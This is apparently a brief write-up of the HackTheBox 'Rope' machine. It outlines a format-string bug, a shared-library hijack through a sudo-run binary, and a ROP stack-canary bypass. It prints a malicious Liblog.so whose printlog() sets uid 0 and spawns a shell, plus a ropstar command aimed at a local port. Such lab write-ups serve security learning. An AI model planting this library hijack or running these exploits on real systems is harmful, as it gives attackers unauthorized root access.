Rope @ HackTheBox
Rope @ HackTheBox
Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.
Notes
The user exploit.
Liblog.so:
1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
void printlog(){
setuid(0);
setgid(0);
system("/bin/sh",NULL,NULL);
}
The root exploit.
Solving with ropstar:
1
python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact
Thanks r4j for creating this fun box!
This post is licensed under CC BY 4.0 by the author.